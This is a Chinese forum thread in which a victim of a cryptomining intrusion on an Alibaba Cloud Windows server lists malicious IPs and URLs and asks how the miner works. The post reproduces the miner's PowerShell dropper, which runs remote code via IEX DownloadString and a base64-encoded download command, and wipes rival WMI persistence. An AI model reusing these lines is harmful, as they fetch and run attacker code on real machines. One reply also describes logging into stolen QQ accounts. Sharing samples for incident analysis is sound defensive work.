服務器被挖礦，阿里云ECS訪問惡意IP，主動連接惡意下載源，挖礦程式。

本次發帖是想大家一起討論一下服務器被挖礦程式攻擊怎么解決，怎么防止。

前段時間在阿里云購買了個低配服務器，裝的window server 2008 r2系統，也沒用來做什么，最近甚至還有人遠程我的服務器，還不斷收到警報，最后阿里云提示挖礦程式



記得10月30號下午3點后我是在出差回來的路上，并沒有連接服務器
而且遠程連接我服務器的ip是俄羅斯車里雅賓斯克的

然后跟隨的是訪問了一個日本東京的礦池IP


接下來便是警告不斷（各種主動連接惡意IP，主動連接惡意下載源，訪問惡意下載源）
多數是用執行cmd/power shell 命令來訪問下載源，網上也有文章提到，這種訪問下載源是直接把文本加載到記憶體中執行，在磁盤上并沒有留下檔案，所以只能通過日志排查出行程（其實我也不太懂。。。。）
其他相關危險警告我也列出來：























跟隨又訪問了一個IP：


最后來到重頭戲：挖礦程式


關于下載源和相關的惡意IP整理出來了。
相關IP：
66.117.6.174（美國加利福尼亞洛杉磯，主動訪問，可能我自己連接）
36.111.174.181（貴陽市，遠程登陸）
109.184.44.179（下諾夫哥羅德州，遠程登陸）
45.32.24.80（日本東京，主動訪問，礦池IP）
106.11.34.14（北京市，阿里云工程師訪問）
80.85.158.117（俄羅斯車里雅賓斯克）


訪問連接和下載源：
http://js.1226bye.xyz:280/v.sct
http://wmi.1217bye.host:8888/2.txt
http://wmi.1217bye.host/s.ps1
http://173.208.139.170/s.txt
http://wmi.1217bye.host/1.txt
http://173.208.139.170/2.txt
http://35.182.171.137/3.txt
http://103.106.250.162:8162/power.txt
http://wmi.1103bye.xyz:8080/power.txt
http://172.83.155.170:8170/power.txt
http://192.236.160.237:8237/power.txt
http://80.85.158.117:8117/power.txt
http://80.85.158.117:8117/s.txt
http://103.106.250.161:8161/s.txt
http://172.83.155.170:8170/s.txt
http://192.236.160.237:8237/s.txt
http://103.106.250.162:8162/s.txt
http://103.106.250.161:8161/power.txt
http://167.88.180.175:8175/download.txt
http://js.1226bye.pw:280/v.sct
http://js.0603bye.info:280/v.sct



相關下載的文本也復制到了（看不懂。。），希望大神們解釋一下這個挖礦程式到底在干什么，他的原理是怎樣的，怎么才能防止服務器被入侵用來挖礦
power.txt

$url="http://167.88.180.175:8175/kill.txt";

$web = New-Object System.Net.WebClient;

$text = $web.DownloadString($url);

$list=$text.trim().split("`r`n",[StringSplitOptions]::RemoveEmptyEntries);

for($i=0;$i -lt $list.count;$i++){

    $line=$list[$i].trim().split(",");

    Get-Process|?{$_.Name -eq ($line[0] -replace "\.[^\.]+$","")}|Stop-Process -Force;

    Get-WmiObject Win32_Process -Filter ("name='"+$line[0]+"'")|%{$_.Terminate();}

    if($line[2].toString() -eq "1"){

        if(test-path -LiteralPath $line[1]){

            Remove-Item -LiteralPath $line[1] -Force;

        }

    }

}



Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='fuckyoumm2_filter'" | Remove-WmiObject -Verbose

Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer -Filter "Name='fuckyoumm2_consumer'" | Remove-WmiObject -Verbose

gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}

gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\conhost.exe'))){$_.Terminate();sleep -s 2;start-process c:\windows\temp\conhost.exe;}}

New-Item -path c:\windows\inf -name aspnet -type directory



IEX (New-Object system.Net.WebClient).DownloadString('http://167.88.180.175:8175/uninstall.txt')



wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETE



wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE

wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE



IEX (New-Object system.Net.WebClient).DownloadString('http://167.88.180.175:8175/wmi.txt')

wmic os get caption







# download.txt8175

powershell.exe -encodedCommand "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADYANwAuADgAOAAuADEAOAAwAC4AMQA3ADUAOgA4ADEANwA1AC8AZABvAHcAbgBsAG8AYQBkAC4AdAB4AHQAJwApAA=="

dowmload.txt


kill.txt


s.txt


uninstall.txt


wmi.txt

uj5u.com熱心網友回復：

一般服務器被挖礦代表服務器被入侵了，黑客會留下影子賬號，在服務器用戶管理器，或者通過云幫手都能看到黑客創建的影子賬號。
解決辦法：先重裝服務器，然后安裝摩西云云幫手的服務器管理工具，隨時可以查看服務器的資源使用狀況，可以設定資源預警提示，
在自己不需要遠程服務器的時候，關閉服務器的遠程功能。

uj5u.com熱心網友回復：

參考 1 樓 water_99 的回復:

一般服務器被挖礦代表服務器被入侵了，黑客會留下影子賬號，在服務器用戶管理器，或者通過云幫手都能看到黑客創建的影子賬號。
解決辦法：先重裝服務器，然后安裝摩西云云幫手的服務器管理工具，隨時可以查看服務器的資源使用狀況，可以設定資源預警提示，
在自己不需要遠程服務器的時候，關閉服務器的遠程功能。

感謝分享

uj5u.com熱心網友回復：

參考 1 樓 water_99 的回復:

一般服務器被挖礦代表服務器被入侵了，黑客會留下影子賬號，在服務器用戶管理器，或者通過云幫手都能看到黑客創建的影子賬號。
解決辦法：先重裝服務器，然后安裝摩西云云幫手的服務器管理工具，隨時可以查看服務器的資源使用狀況，可以設定資源預警提示，
在自己不需要遠程服務器的時候，關閉服務器的遠程功能。

有點奇怪的是，阿里云給我發提醒的時候，我上去檢測發現資源使用正常，不過這兩天裝了個數字殺毒軟體，就沒提醒了。。

uj5u.com熱心網友回復：

服務器工具軟體是需要不斷測驗體驗的，我在服務器上體驗過，華眾，360殺毒,云鎖，寶塔，火絨，。。。。。

發現最好用的軟體，是有技術團隊持續升級的軟體，沒有技術團隊升級的軟體都慢慢淘汰了。

火絨淘汰360，因為火絨比較干凈沒廣告
云幫手淘汰寶塔，是因為手上服務器太多了，用寶塔管理需要每臺服務器都記錄好寶塔地址，登錄賬號密碼

uj5u.com熱心網友回復：

參考 4 樓 water_99的回復:

服務器工具軟體是需要不斷測驗體驗的，我在服務器上體驗過，華眾，360殺毒,云鎖，寶塔，火絨，。。。。。

發現最好用的軟體，是有技術團隊持續升級的軟體，沒有技術團隊升級的軟體都慢慢淘汰了。

火絨淘汰360，因為火絨比較干凈沒廣告
云幫手淘汰寶塔，是因為手上服務器太多了，用寶塔管理需要每臺服務器都記錄好寶塔地址，登錄賬號密碼

剛剛開始入行，對這些還不太懂，感謝前輩分享

uj5u.com熱心網友回復：

如果是在阿里云上面有多臺虛擬機，建議購買阿里云的企業版云安全產品 。

uj5u.com熱心網友回復：

很久很久以前上學的時候，機房有個電腦感染了qq盜號木馬
我通過抓包搞到了它將盜取的qq號發回去的郵箱賬戶
在其中的發件信箱里找到了幾百個qq號
試驗了幾個還都能登錄。
我登錄了幾個，修改了密碼，給上面的好友發資訊，說本qq已經被盜，請你聯系qq賬戶本人和我聯系，取回帳戶，但是他們都覺得我是騙子。一個也沒找我。 

轉載請註明出處，本文鏈接：https://www.uj5u.com/caozuo/47167.html

標籤：安全技術/病毒

上一篇：WindowsServer遷移

下一篇：求助！！！